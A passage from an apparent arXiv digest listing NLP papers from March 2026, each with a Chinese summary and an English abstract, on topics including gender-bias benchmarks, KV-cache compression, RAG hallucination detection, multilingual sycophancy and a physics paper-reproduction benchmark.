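With 32 attempts and rho = 0.5, only about 1.9 attempts' worth of independent signal remains, which is why decorrelating voters looked attractive before the experiments showed temperature alone suffices.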
[NLP-41] ProText: A benchmark dataset for measuring (mis)gendering in long-form texts
【Quick Read】: This paper addresses gendering and misgendering by generative AI when processing long-form English texts, particularly the systematic biases that arise when models face inputs without explicit gender cues or default to heteronormative assumptions. The key to the solution is the ProText dataset, which spans Theme nouns (names, occupations, titles, kinship terms), Theme categories (stereotypically male, stereotypically female, gender-neutral/non-gendered), and Pronoun categories (masculine, feminine, gender-neutral, none). This design enables systematic evaluation of gender bias in large language models (LLMs) on text transformations such as rewriting and summarization, moving beyond traditional pronoun-resolution benchmarks and beyond the gender binary to quantify implicit gender bias in complex contexts.
Link: https://arxiv.org/abs/2603.27838
Authors: Hadas Kotek,Margit Bowler,Patrick Sonnenberg,Yu’an Yang
Affiliations: Unknown
Subjects: Computation and Language (cs.CL)
Comments: 13 pages, 10 figures, 6 tables
Abstract:We introduce ProText, a dataset for measuring gendering and misgendering in stylistically diverse long-form English texts. ProText spans three dimensions: Theme nouns (names, occupations, titles, kinship terms), Theme category (stereotypically male, stereotypically female, gender-neutral/non-gendered), and Pronoun category (masculine, feminine, gender-neutral, none). The dataset is designed to probe (mis)gendering in text transformations such as summarization and rewrites using state-of-the-art Large Language Models, extending beyond traditional pronoun resolution benchmarks and beyond the gender binary. We validated ProText through a mini case study, showing that even with just two prompts and two models, we can draw nuanced insights regarding gender bias, stereotyping, misgendering, and gendering. We reveal systematic gender bias, particularly when inputs contain no explicit gender cues or when models default to heteronormative assumptions.
[NLP-42] Improving Clinical Diagnosis with Counterfactual Multi-Agent Reasoning
【Quick Read】: This paper addresses the lack of interpretability in current LLM-based diagnostic support systems, which typically reason over fixed clinical evidence without explicitly testing how individual findings support or weaken competing diagnostic hypotheses. The key to the solution is a counterfactual multi-agent diagnostic framework inspired by clinical training. Its core mechanisms are counterfactual case editing, which modifies clinical findings to evaluate their effect on competing diagnoses, and the Counterfactual Probability Gap, which quantifies how strongly an individual finding supports a diagnosis. These counterfactual signals drive multi-round specialist-agent discussions, enabling the system to challenge unsupported hypotheses, refine differential diagnoses, and produce more interpretable reasoning trajectories.
Link: https://arxiv.org/abs/2603.27820
Authors: Zhiwen You,Xi Chen,Aniket Vashishtha,Simo Du,Gabriel Erion-Barner,Hongyuan Mei,Hao Peng,Yue Guo
Affiliations: UIUC; Beth Israel Deaconess Medical Center; Jacobi Medical Center; Learning Machines
Subjects: Computation and Language (cs.CL)
Comments:
Abstract:Clinical diagnosis is a complex reasoning process in which clinicians gather evidence, form hypotheses, and test them against alternative explanations. In medical training, this reasoning is explicitly developed through counterfactual questioning–e.g., asking how a diagnosis would change if a key symptom were absent or altered–to strengthen differential diagnosis skills. As large language model (LLM)-based systems are increasingly used for diagnostic support, ensuring the interpretability of their recommendations becomes critical. However, most existing LLM-based diagnostic agents reason over fixed clinical evidence without explicitly testing how individual findings support or weaken competing diagnoses. In this work, we propose a counterfactual multi-agent diagnostic framework inspired by clinician training that makes hypothesis testing explicit and evidence-grounded. Our framework introduces counterfactual case editing to modify clinical findings and evaluate how these changes affect competing diagnoses. We further define the Counterfactual Probability Gap, a method that quantifies how strongly individual findings support a diagnosis by measuring confidence shifts under these edits. These counterfactual signals guide multi-round specialist discussions, enabling agents to challenge unsupported hypotheses, refine differential diagnoses, and produce more interpretable reasoning trajectories. Across three diagnostic benchmarks and seven LLMs, our method consistently improves diagnostic accuracy over prompting and prior multi-agent baselines, with the largest gains observed in complex and ambiguous cases. Human evaluation further indicates that our framework produces more clinically useful, reliable, and coherent reasoning. These results suggest that incorporating counterfactual evidence verification is an important step toward building reliable AI systems for clinical decision support.
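One simple reading of the Counterfactual Probability Gap described above is a per-diagnosis confidence shift between the original case and a counterfactually edited one (a hypothetical simplification for illustration; the paper's exact definition may differ):

```python
def probability_gaps(p_original, p_edited):
    """Confidence shift for each candidate diagnosis when a clinical
    finding is removed or altered. A positive gap means the edited
    finding was supporting that diagnosis; a negative gap means it
    was arguing against it."""
    return {dx: p_original[dx] - p_edited.get(dx, 0.0) for dx in p_original}
```

For instance, if removing "fever" drops P(influenza) from 0.7 to 0.4 while P(common cold) rises from 0.2 to 0.5, the gaps (+0.3 and -0.3) flag fever as evidence for influenza, which the specialist agents can then debate.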
[NLP-43] KVSculpt: KV Cache Compression as Distillation
【Quick Read】: This paper addresses the excessive storage overhead of the KV cache in long-context large language model (LLM) inference, focusing on how to compress aggressively without sacrificing attention behavior. The core of the solution, KVSculpt, abandons conventional strategies based on selecting (eviction) or merging original KV pairs and instead optimizes a smaller set of unconstrained KV pairs in continuous embedding space to reconstruct each layer's attention. Specifically, keys are optimized with L-BFGS while values are solved in closed form via least squares, alternating between the two during iteration. An adaptive budget allocation mechanism additionally uses a cheap pilot compression run to assess the compression difficulty of each layer and attention head and redistributes the budget accordingly. Experiments show that, compared with Select+Fit, KVSculpt reduces KL divergence by 3.5-4.1x across compression ratios, with adaptive allocation contributing a further 1.3x KL reduction at no extra inference cost, confirming that fine-grained budget allocation is essential given highly non-uniform compression difficulty.
Link: https://arxiv.org/abs/2603.27819
Authors: Bo Jiang,Sian Jin
Affiliations: Temple University
Subjects: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Computation and Language (cs.CL)
Comments:
Abstract:KV cache compression is critical for efficient long-context LLM inference. Approaches that reduce the per-pair footprint – quantization and low-rank decomposition – are orthogonal to those that reduce the sequence length of the cache. Along the sequence-length dimension, existing methods range from pure eviction – selecting which KV pairs to keep – to merging, which combines similar pairs into fewer ones. Both remain anchored to the original cache entries. We propose KVSculpt, which moves to the other end of this spectrum: instead of selecting or combining original pairs, we optimize a smaller set of unconstrained KV pairs in continuous embedding space to preserve each layer’s attention behavior. Keys are optimized via L-BFGS and values are solved in closed form via least squares, alternating every few steps. On top of this, we introduce adaptive budget allocation, which uses a cheap pilot compression run to redistribute the compression budget across layers and KV heads based on per-component difficulty. On Qwen2.5-1.5B-Instruct with 2048-token contexts, KVSculpt reduces KL divergence by 3.5-4.1x compared to Select+Fit – attention-score eviction with least-squares value fitting – across compression ratios r ∈ {0.3, 0.5, 0.7}. Adaptive allocation provides an additional 1.3x KL reduction at no extra inference cost. Analysis reveals that compression difficulty is highly non-uniform: per-layer pilot MSE varies by up to 100x across layers, and the two KV heads within a single layer can differ by up to 467x – demonstrating that fine-grained budget allocation is essential.
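The adaptive allocation step above can be illustrated with a simple proportional rule: layers whose pilot-run reconstruction error is higher receive a larger share of the global keep-budget (an assumed rule for illustration; KVSculpt's exact allocation scheme is described in the paper, not here):

```python
def adaptive_budget(total_keep, pilot_mse):
    """Split a global KV-pair budget across layers in proportion to
    each layer's pilot-compression MSE, handing rounding leftovers
    to the layers with the largest fractional remainders."""
    total = sum(pilot_mse)
    raw = [total_keep * m / total for m in pilot_mse]
    keep = [int(r) for r in raw]
    leftover = total_keep - sum(keep)
    # give spare units to layers with the biggest truncated fraction
    by_frac = sorted(range(len(raw)), key=lambda i: raw[i] - keep[i], reverse=True)
    for i in by_frac[:leftover]:
        keep[i] += 1
    return keep
```

With a 100x spread in per-layer pilot MSE, as the abstract reports, such a rule concentrates most of the budget on the handful of hard layers instead of splitting it uniformly.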
[NLP-44] Conversational Agents and the Understanding of Human Language: Reflections on AI LLMs and Cognitive Science
【Quick Read】: This paper asks whether the development of natural language processing (NLP) has deepened our understanding of the human language capacity. It argues that although current chatbots based on artificial neural networks attain impressive language abilities, the evolution of language technology has not substantially advanced our understanding of how human minds process natural language. The key to its approach is a systematic review of NLP's evolution from its beginnings to the age of large language models, comparing each of its main paradigms with theories of the human language capacity from linguistics and cognitive science, thereby exposing the disconnect between technological progress and cognitive understanding.
Link: https://arxiv.org/abs/2603.27809
Authors: Andrei Popescu-Belis
Affiliations: HEIG-VD / HES-SO; EPFL
Subjects: Computation and Language (cs.CL)
Comments: 7 pages
Abstract:In this paper, we discuss the relationship between natural language processing by computers (NLP) and the understanding of the human language capacity, as studied by linguistics and cognitive science. We outline the evolution of NLP from its beginnings until the age of large language models, and highlight for each of its main paradigms some similarities and differences with theories of the human language capacity. We conclude that the evolution of language technology has not substantially deepened our understanding of how human minds process natural language, despite the impressive language abilities attained by current chatbots using artificial neural networks.
[NLP-45] Understanding Teacher Revisions of Large Language Model-Generated Feedback
【Quick Read】: This paper examines how teachers revise AI-generated feedback before it reaches learners, focusing on how they adapt generative AI feedback to real classroom needs. Analyzing 1,349 instances of AI-generated feedback and the corresponding teacher-edited versions, the study characterizes revision patterns, their predictability, and their effect on feedback type. The key findings are threefold: first, teachers leave AI feedback unmodified in about 80% of cases, and edited feedback tends to be longer and is subsequently shortened; second, machine learning models using sentence embeddings of the AI feedback text achieve fair accuracy (AUC = 0.75) in predicting whether feedback will be revised; third, teacher revisions often convert high-information explanations into concise, corrective feedback, indicating a misalignment between current systems and teachers' pedagogical priorities. Together these findings ground the design of AI feedback systems that better match teacher practice and reduce unnecessary editing effort.
Link: https://arxiv.org/abs/2603.27806
Authors: Conrad Borchers,Luiz Rodrigues,Newarney Torrezão da Costa,Cleon Xavier,Rafael Ferreira Mello
Affiliations: Unknown
Subjects: Computation and Language (cs.CL); Computers and Society (cs.CY)
Comments: Accepted as full paper to the 27th International Conference on Artificial Intelligence in Education (AIED 2026)
Abstract:Large language models (LLMs) increasingly generate formative feedback for students, yet little is known about how teachers revise this feedback before it reaches learners. Teachers’ revisions shape what students receive, making revision practices central to evaluating AI classroom tools. We analyze a dataset of 1,349 instances of AI-generated feedback and corresponding teacher-edited explanations from 117 teachers. We examine (i) textual characteristics associated with teacher revisions, (ii) whether revision decisions can be predicted from the AI feedback text, and (iii) how revisions change the pedagogical type of feedback delivered. First, we find that teachers accept AI feedback without modification in about 80% of cases, while edited feedback tends to be significantly longer and subsequently shortened by teachers. Editing behavior varies substantially across teachers: about 50% never edit AI feedback, and only about 10% edit more than two-thirds of feedback instances. Second, machine learning models trained only on the AI feedback text as input features, using sentence embeddings, achieve fair performance in identifying which feedback will be revised (AUC=0.75). Third, qualitative coding shows that when revisions occur, teachers often simplify AI-generated feedback, shifting it away from high-information explanations toward more concise, corrective forms. Together, these findings characterize how teachers engage with AI-generated feedback in practice and highlight opportunities to design feedback systems that better align with teacher priorities while reducing unnecessary editing effort.
[NLP-46] TailNLG: A Multilingual Benchmark Addressing Verbalization of Long-Tail Entities
【Quick Read】: This paper addresses the systematic bias of Data-to-Text generation against long-tail entities, i.e., entities that appear infrequently in knowledge graphs yet matter greatly to non-expert users and retrieval-augmented generation systems. The key to the solution is TailNLG, the first multilingual benchmark targeting long-tail entities, covering English, Italian, and Spanish, built from Wikidata over entities of varying popularity. Three families of large language models (LLMs) are evaluated in zero-shot settings on rare versus common entities, revealing a consistent bias: embedding-based scores are lower and model uncertainty is higher for rare entities. These results expose the limitations of existing evaluation metrics and motivate more reliable evaluation frameworks.
Link: https://arxiv.org/abs/2603.27768
Authors: Lia Draetta,Michael Oliverio,Virginia Ramón-Ferrer,Pier Felice Balestrucci,Flaviana Corallo,Carlos Badenes-Olmedo,Alessandro Mazzei,Marco Antonio Stranisci,Rossana Damiano
Affiliations: University of Turin, Italy; Universidad Politécnica de Madrid, Spain
Subjects: Computation and Language (cs.CL)
Comments:
Abstract:The automatic verbalization of structured knowledge is a key task for making knowledge graphs accessible to non-expert users and supporting retrieval-augmented generation systems. Although recent advances in Data-to-Text generation have improved multilingual coverage, little attention has been paid to potential biases in the verbalization of rare entities, frequently known as long-tail entities. In this work, we present the first systematic study of long-tail entities in Data-to-Text generation. We introduce TailNLG, a new multilingual benchmark in English, Italian, and Spanish, built from Wikidata and covering entities with varying levels of popularity. We evaluate three different families of large language models in zero-shot settings and compare their performance on rare versus common entities, as well as against the established WebNLG benchmark. Our results reveal a consistent bias against long-tail entities: embedding-based scores are lower, and model uncertainty is higher for rare entities. We further show that the impact of long-tail entities varies across models and languages, and that existing evaluation metrics do not consistently capture these differences, highlighting the need for more reliable evaluation frameworks.
[NLP-47] Retromorphic Testing with Hierarchical Verification for Hallucination Detection in RAG
【Quick Read】: This paper addresses hallucinations in retrieval-augmented generation (RAG), where model outputs diverge from or contradict the retrieved context. Existing methods either provide coarse-grained, answer-level scores or focus on open-domain factuality, lacking fine-grained, interpretable, evidence-grounded diagnostics for the specific claims in generated content. The core of the solution is RT4CHART, a retromorphic-testing framework for context-faithfulness assessment that decomposes model outputs into independently verifiable claims and performs hierarchical, local-to-global verification, labeling each claim as entailed, contradicted, or baseless. Claim-level decisions are mapped back to specific answer spans, and supporting or refuting evidence is extracted automatically, enabling fine-grained, interpretable auditing. Empirically, RT4CHART outperforms existing baselines on both the RAGTruth++ and RAGTruth-Enhance benchmarks, reaching a span-level F1 of 47.5%, and ablations confirm that the hierarchical verification design is the primary driver of the gains.
Link: https://arxiv.org/abs/2603.27752
Authors: Boxi Yu,Yuzhong Zhang,Liting Lin,Lionel Briand,Emir Muñoz
Affiliations: Lero, the Research Ireland Centre for Software, University of Limerick; The Chinese University of Hong Kong, Shenzhen; University of Ottawa; Genesys
Subjects: Computation and Language (cs.CL); Software Engineering (cs.SE)
Comments:
Abstract:Large language models (LLMs) continue to hallucinate in retrieval-augmented generation (RAG), producing claims that are unsupported by or conflict with the retrieved context. Detecting such errors remains challenging when faithfulness is evaluated solely with respect to the retrieved context. Existing approaches either provide coarse-grained, answer-level scores or focus on open-domain factuality, often lacking fine-grained, evidence-grounded diagnostics. We present RT4CHART, a retromorphic testing framework for context-faithfulness assessment. RT4CHART decomposes model outputs into independently verifiable claims and performs hierarchical, local-to-global verification against the retrieved context. Each claim is assigned one of three labels: entailed, contradicted, or baseless. Furthermore, RT4CHART maps claim-level decisions back to specific answer spans and retrieves explicit supporting or refuting evidence from the context, enabling fine-grained and interpretable auditing. We evaluate RT4CHART on RAGTruth++ (408 samples) and RAGTruth-Enhance (2,675 samples), a newly re-annotated benchmark. RT4CHART achieves the best answer-level hallucination detection F1 among all baselines. On RAGTruth++, it reaches an F1 score of 0.776, outperforming the strongest baseline by 83%. On RAGTruth-Enhance, it achieves a span-level F1 of 47.5%. Ablation studies show that the hierarchical verification design is the primary driver of performance gains. Finally, our re-annotation reveals 1.68x more hallucination cases than the original labels, suggesting that existing benchmarks substantially underestimate the prevalence of hallucinations. 
[NLP-48] KAT-Coder-V2 Technical Report
【Quick Read】: This paper addresses unstable performance of generative AI on complex coding tasks, the difficulty of unifying capabilities across domains, and the inefficiency of reinforcement learning (RL) training. The key to the solution is a "Specialize-then-Unify" paradigm: agentic coding is decomposed into five expert domains (SWE, WebCoding, Terminal, WebSearch, and General), each trained independently with supervised fine-tuning and reinforcement learning, then consolidated into a single model via on-policy distillation. The work also builds KwaiEnv, a modular environment sustaining large numbers of concurrent sandbox instances, introduces MCLA to stabilize MoE RL training, and proposes Tree Training to eliminate redundant computation over tree-structured trajectories, achieving speedups of up to 6.2x. Together these components substantially improve performance and generalization across multiple benchmarks.
Link: https://arxiv.org/abs/2603.27703
Authors: Fengxiang Li,Han Zhang,Haoyang Huang,Jinghui Wang,Jinhua Hao,Kun Yuan,Mengtong Li,Minglei Zhang,Pengcheng Xu,Wenhao Zhuang,Yizhen Shao,Zongxian Feng,Can Tang,Chao Wang,Chengxiao Tong,Fan Yang,Gang Xiong,Haixuan Gao,Han Gao,Hao Wang,Haochen Liu,Hongliang Sun,Jiabao Li,Jingwen Chang,Jun Du,Junyi Peng,Leizhen Cui,Meimei Jing,Mingqi Wu,Shangpeng Yan,Shaotong Qi,Suzhe Xu,Wenxuan Zhao,Xianda Sun,Xuan Xie,Yanbo Wang,Yao Xia,Yinghan Cui,Yingpeng Chen,Yong Wang,Yuze Shi,Zhiwei Shen,Ziyu Wang,Ming Sun,Lin Ye,Bin Chen
Affiliations: Unknown
Subjects: Computation and Language (cs.CL); Machine Learning (cs.LG)
Comments: 22 pages, 7 figures
Abstract:We present KAT-Coder-V2, an agentic coding model developed by the KwaiKAT team at Kuaishou. KAT-Coder-V2 adopts a “Specialize-then-Unify” paradigm that decomposes agentic coding into five expert domains - SWE, WebCoding, Terminal, WebSearch, and General - each undergoing independent supervised fine-tuning and reinforcement learning, before being consolidated into a single model via on-policy distillation. We develop KwaiEnv, a modular infrastructure sustaining tens of thousands of concurrent sandbox instances, and scale RL training along task complexity, intent alignment, and scaffold generalization. We further propose MCLA for stabilizing MoE RL training and Tree Training for eliminating redundant computation over tree-structured trajectories with up to 6.2x speedup. KAT-Coder-V2 achieves 79.6% on SWE-bench Verified (vs. Claude Opus 4.6 at 80.8%), 88.7 on PinchBench (surpassing GLM-5 and MiniMax M2.7), ranks first across all three frontend aesthetics scenarios, and maintains strong generalist scores on Terminal-Bench Hard (46.8) and τ²-Bench (93.9). Our model is publicly available at this https URL.
[NLP-49] Can Large Language Models Simulate Human Cognition Beyond Behavioral Imitation?
【Quick Read】: This paper asks whether current large language models (LLMs) can genuinely simulate human cognitive processes or merely imitate surface-level behavior. Existing datasets suffer from synthetic reasoning traces or population-level aggregation, failing to capture individual cognitive patterns. The key to the solution is a benchmark built from the longitudinal research trajectories of 217 AI researchers, treating each author's scientific publications as an externalized representation of their cognitive processes. A cross-domain, temporal-shift generalization setting distinguishes whether models transfer authentic cognitive patterns or merely imitate behavior, and a multidimensional cognitive-alignment metric assesses individual-level cognitive consistency, providing a first empirical framework for analyzing LLMs' capacity to simulate human cognition.
Link: https://arxiv.org/abs/2603.27694
Authors: Yuxuan Gu,Lunjun Liu,Xiaocheng Feng,Kun Zhu,Weihong Zhong,Lei Huang,Bing Qin
Affiliations: Unknown
Subjects: Computation and Language (cs.CL)
Comments:
Abstract:An essential problem in artificial intelligence is whether LLMs can simulate human cognition or merely imitate surface-level behaviors, while existing datasets suffer from either synthetic reasoning traces or population-level aggregation, failing to capture authentic individual cognitive patterns. We introduce a benchmark grounded in the longitudinal research trajectories of 217 researchers across diverse domains of artificial intelligence, where each author’s scientific publications serve as an externalized representation of their cognitive processes. To distinguish whether LLMs transfer cognitive patterns or merely imitate behaviors, our benchmark deliberately employs a cross-domain, temporal-shift generalization setting. A multidimensional cognitive alignment metric is further proposed to assess individual-level cognitive consistency. Through systematic evaluation of state-of-the-art LLMs and various enhancement techniques, we provide a first-stage empirical study on the questions: (1) How well do current LLMs simulate human cognition? and (2) How far can existing techniques enhance these capabilities?
[NLP-50] Investigating the Influence of Language on Sycophantic Behavior of Multilingual LLM s
【Quick Read】: This paper addresses sycophancy in large language models (LLMs), the tendency to agree with user statements regardless of their validity. Although newer model generations have substantially reduced overall sycophancy through various mitigation strategies, the effect of language on this behavior has not been studied systematically. The key to the solution is a multilingual evaluation: three state-of-the-art models (GPT-4o mini, Gemini 1.5 Flash, and Claude 3.5 Haiku) are tested with tweet-like opinion prompts translated into five non-English languages (Arabic, Chinese, French, Spanish, and Portuguese), with further analysis of how language shapes model agreeableness on sensitive topics. The results reveal systematic cultural and linguistic patterns, showing that even with progress on mitigation, broader multilingual audits remain necessary for trustworthy, bias-aware deployment.
Link: https://arxiv.org/abs/2603.27664
Authors: Bayan Abdullah Aldahlawi,A. B. M. Ashikur Rahman,Irfan Ahmad
Affiliations: Unknown
Subjects: Computation and Language (cs.CL)
Comments: 15 Pages, 5 figures
Abstract:Large language models (LLMs) have achieved strong performance across a wide range of tasks, but they are also prone to sycophancy, the tendency to agree with user statements regardless of validity. Previous research has outlined both the extent and the underlying causes of sycophancy in earlier models, such as ChatGPT-3.5 and Davinci. Newer models have since undergone multiple mitigation strategies, yet there remains a critical need to systematically test their behavior. In particular, the effect of language on sycophancy has not been explored. In this work, we investigate how the language influences sycophantic responses. We evaluate three state-of-the-art models, GPT-4o mini, Gemini 1.5 Flash, and Claude 3.5 Haiku, using a set of tweet-like opinion prompts translated into five additional languages: Arabic, Chinese, French, Spanish, and Portuguese. Our results show that although newer models exhibit significantly less sycophancy overall compared to earlier generations, the extent of sycophancy is still influenced by the language. We further provide a granular analysis of how language shapes model agreeableness across sensitive topics, revealing systematic cultural and linguistic patterns. These findings highlight both the progress of mitigation efforts and the need for broader multilingual audits to ensure trustworthy and bias-aware deployment of LLMs.
[NLP-51] The Degree of Language Diacriticity and Its Effect on Tasks
【Quick Read】: This paper addresses the lack of a systematic, cross-linguistic quantification of diacritic complexity in orthographies, and the unclear mechanism by which this complexity affects downstream NLP tasks such as diacritics restoration. The key to the solution is a data-driven framework of corpus-level, information-theoretic metrics that quantify diacritic complexity across writing systems via frequency, ambiguity, and structural diversity, evaluated empirically over 24 corpora in 15 languages. The analysis reveals a strong association between diacritic complexity and the performance of restoration models; in multi-diacritic scripts in particular, structural complexity explains performance differences better than frequency-based measures.
Link: https://arxiv.org/abs/2603.27653
Authors: Adi Cohen,Yuval Pinter
Affiliations: Unknown
Subjects: Computation and Language (cs.CL)
Comments: Accepted to CAWL 2026
Abstract:Diacritics are orthographic marks that clarify pronunciation, distinguish similar words, or alter meaning. They play a central role in many writing systems, yet their impact on language technology has not been systematically quantified across scripts. While prior work has examined diacritics in individual languages, there’s no cross-linguistic, data-driven framework for measuring the degree to which writing systems rely on them and how this affects downstream tasks. We propose a data-driven framework for quantifying diacritic complexity using corpus-level, information-theoretic metrics that capture the frequency, ambiguity, and structural diversity of character-diacritic combinations. We compute these metrics over 24 corpora in 15 languages, spanning both single- and multi-diacritic scripts. We then examine how diacritic complexity correlates with performance on the task of diacritics restoration, evaluating BERT- and RNN-based models. We find that across languages, higher diacritic complexity is strongly associated with lower restoration accuracy. In single-diacritic scripts, where character-diacritic combinations are more predictable, frequency-based and structural measures largely align. In multi-diacritic scripts, however, structural complexity exhibits the strongest association with performance, surpassing frequency-based measures. These findings show that measurable properties of diacritic usage influence the performance of diacritic restoration models, demonstrating that orthographic complexity is not only descriptive but functionally relevant for modeling.
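The kind of corpus-level, information-theoretic measure described above can be approximated with Unicode decomposition: split each character into its base letter and attached combining marks, then take the Shannon entropy over the observed base-mark combinations (a minimal sketch; the paper's metrics for frequency, ambiguity, and structural diversity are richer than this):

```python
import math
import unicodedata
from collections import Counter

def base_mark_pairs(text):
    """Decompose NFD-normalized text into (base char, combining marks) pairs."""
    pairs, base, marks = [], None, []
    for ch in unicodedata.normalize("NFD", text):
        if unicodedata.combining(ch):
            marks.append(ch)
        else:
            if base is not None:
                pairs.append((base, tuple(marks)))
            base, marks = ch, []
    if base is not None:
        pairs.append((base, tuple(marks)))
    return pairs

def combination_entropy(text):
    """Shannon entropy (bits) over character-diacritic combinations."""
    counts = Counter(base_mark_pairs(text))
    total = sum(counts.values())
    return -sum(c / total * math.log2(c / total) for c in counts.values())
```

For example, `combination_entropy("aaaa")` is 0.0 (a single combination), while `"aá"` gives 1.0 bit, because the bare and accented forms of "a" are equally frequent.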
[NLP-52] Budget-Xfer: Budget-Constrained Source Language Selection for Cross-Lingual Transfer to African Languages SIGIR2026
【Quick Read】: This paper addresses the lack of rigor in evaluating source-language selection strategies for cross-lingual transfer learning: existing comparisons do not control for total training data, confounding language-selection effects with data-quantity effects. The key to the solution is Budget-Xfer, which formulates multi-source cross-lingual transfer as a budget-constrained resource allocation problem: given a fixed annotation budget B, it jointly optimizes which source languages to include and how much data to allocate from each. Through systematic experimentation (288 runs), the study shows that multi-source transfer significantly outperforms single-source transfer (Cohen's d = 0.80-1.98), identifies structural budget underutilization as the performance bottleneck, and finds that differences among multi-source strategies are modest and non-significant while the value of embedding similarity as a selection proxy is task-dependent.
Link: https://arxiv.org/abs/2603.27651
Authors: Tewodros Kederalah Idris,Roald Eiselen,Prasenjit Mitra
Affiliations: Carnegie Mellon University Africa; North-West University
Subjects: Computation and Language (cs.CL)
Comments: 5 pages, 5 tables. Submitted to SIGIR 2026 Short Paper track
Abstract:Cross-lingual transfer learning enables NLP for low-resource languages by leveraging labeled data from higher-resource sources, yet existing comparisons of source language selection strategies do not control for total training data, confounding language selection effects with data quantity effects. We introduce Budget-Xfer, a framework that formulates multi-source cross-lingual transfer as a budget-constrained resource allocation problem. Given a fixed annotation budget B, our framework jointly optimizes which source languages to include and how much data to allocate from each. We evaluate four allocation strategies across named entity recognition and sentiment analysis for three African target languages (Hausa, Yoruba, Swahili) using two multilingual models, conducting 288 experiments. Our results show that (1) multi-source transfer significantly outperforms single-source transfer (Cohen’s d = 0.80 to 1.98), driven by a structural budget underutilization bottleneck; (2) among multi-source strategies, differences are modest and non-significant; and (3) the value of embedding similarity as a selection proxy is task-dependent, with random selection outperforming similarity-based selection for NER but not sentiment analysis.
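The budget-constrained formulation above can be made concrete with one simple allocation strategy: distribute the annotation budget B across source languages in proportion to a similarity score, capped by each language's available data, and redistribute whatever is left over (a hypothetical strategy for illustration; the paper evaluates four strategies of its own, not this exact one):

```python
def allocate_budget(budget, sources):
    """sources: {lang: (available_examples, similarity_to_target)}.
    Returns {lang: examples_allocated} with the total never exceeding budget."""
    alloc = {lang: 0 for lang in sources}
    remaining = dict(sources)
    left = budget
    while left > 0 and remaining:
        total_sim = sum(sim for _, sim in remaining.values())
        spent, exhausted = 0, []
        for lang, (avail, sim) in remaining.items():
            share = int(left * sim / total_sim)       # proportional share
            take = min(share, avail - alloc[lang])    # capped by availability
            alloc[lang] += take
            spent += take
            if alloc[lang] >= avail:
                exhausted.append(lang)
        for lang in exhausted:
            del remaining[lang]
        if spent == 0:  # budget too small to split further
            break
        left -= spent
    return alloc
```

With a budget of 100 and one source capped at 10 examples, the cap binds and the surplus flows to the other source; an uncapped scheme would instead leave part of the budget unspent, which is exactly the structural underutilization bottleneck the abstract identifies.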
[NLP-53] PRBench: End-to-end Paper Reproduction in Physics Research
【速读】: 该论文旨在解决当前生成式 AI (Generative AI) 代理在真实科学论文中实现端到端复现(end-to-end reproduction)能力不足的问题,即尽管大语言模型(Large Language Models, LLMs)具备较强的推理与问题求解能力,但其能否可靠地从原始论文出发完成完整科研任务仍不明确。解决方案的关键在于构建 PRBench——一个由30个专家精心设计的任务组成的基准测试集,覆盖物理学11个子领域,每个任务要求代理理解论文方法、从零实现算法并产出与原论文一致的定量结果;所有任务均基于真实发表论文,且通过严格验证的真值结果和评分标准进行评估,同时在沙盒环境中运行以确保可重复性和安全性。该基准首次系统性地衡量了AI代理在科学推理与执行层面的综合能力,并揭示了现有代理在代码正确性、数据准确性等方面的显著缺陷。
链接: https://arxiv.org/abs/2603.27646
作者: Shi Qiu,Junyi Deng,Yiwei Deng,Haoran Dong,Jieyu Fu,Mao Li,Zeyu Li,Zhaolong Zhang,Huiwen Zheng,Leidong Bao,Anqi Lv,Zihan Mo,Yadi Niu,Yiyang Peng,Yu Tian,Yili Wang,Ziyu Wang,Zi-Yu Wang,Jiashen Wei,Liuheng Wu,Aoran Xue,Leyi Yang,Guanglu Yuan,Xiarui Zhan,Jingjun Zhang,Zifan Zheng,Pengfei Liu,Linrui Zhen,Kaiyang Li,Qichang Li,Ziheng Zhou,Guo-En Nian,Yunwei Xiao,Qing-Hong Cao,Linjie Dai,Xu Feng,Peng Gao,Ying Gu,Chang Liu,Jia Liu,Ming-xing Luo,Yan-Qing Ma,Liang-You Peng,Huichao Song,Shufeng Wang,Chenxu Wang,Tao Wang,Yi-Nan Wang,Chengyin Wu,Pengwei Zhao,Hua Xing Zhu
机构: Peking University (北京大学); Beijing Computational Science Research Center (北京计算科学研究中心)
类目: Computation and Language (cs.CL); High Energy Physics - Lattice (hep-lat); High Energy Physics - Phenomenology (hep-ph); Computational Physics (physics.comp-ph); Optics (physics.optics)
备注: 17 pages, 3 figures
Abstract:AI agents powered by large language models exhibit strong reasoning and problem-solving capabilities, enabling them to assist scientific research tasks such as formula derivation and code generation. However, whether these agents can reliably perform end-to-end reproduction from real scientific papers remains an open question. We introduce PRBench, a benchmark of 30 expert-curated tasks spanning 11 subfields of physics. Each task requires an agent to comprehend the methodology of a published paper, implement the corresponding algorithms from scratch, and produce quantitative results matching the original publication. Agents are provided only with the task instruction and paper content, and operate in a sandboxed execution environment. All tasks are contributed by domain experts from over 20 research groups at the School of Physics, Peking University, each grounded in a real published paper and validated through end-to-end reproduction with verified ground-truth results and detailed scoring rubrics. Using an agentified assessment pipeline, we evaluate a set of coding agents on PRBench and analyze their capabilities across key dimensions of scientific reasoning and execution. The best-performing agent, OpenAI Codex powered by GPT-5.3-Codex, achieves a mean overall score of 34%. All agents exhibit a zero end-to-end callback success rate, with particularly poor performance in data accuracy and code correctness. We further identify systematic failure modes, including errors in formula implementation, inability to debug numerical simulations, and fabrication of output data. Overall, PRBench provides a rigorous benchmark for evaluating progress toward autonomous scientific research.
[NLP-54] Umwelt Engineering: Designing the Cognitive Worlds of Linguistic Agents
【速读】: 该论文试图解决的问题是:如何通过系统性地设计语言认知环境来提升智能体(agent)的推理能力与认知质量,而不仅仅是依赖传统的提示工程(prompt engineering)或上下文工程(context engineering)。其核心挑战在于验证“语言媒介本身是否能够直接塑造认知过程”,即是否存在一种“语言-认知”因果关系。解决方案的关键在于提出并实证检验“Umwelt工程”(Umwelt engineering),这是一种上游层面的设计策略,通过对词汇约束(如消除“to have”或“to be”)重构语言使用范式,从而诱导模型认知结构发生实质性变化。实验表明,这种语言约束能显著改善伦理推理、分类准确性和元认知校准等指标,并通过多代理协同实现更全面的问题覆盖,揭示出“认知重构”与“认知多样性”两大机制,为构建更具鲁棒性和可解释性的AI系统提供了新路径。
链接: https://arxiv.org/abs/2603.27626
作者: Rodney Jehu-Appiah
机构: 未知
类目: Computation and Language (cs.CL); Artificial Intelligence (cs.AI)
备注: 24 pages, 2 figures, 7 tables
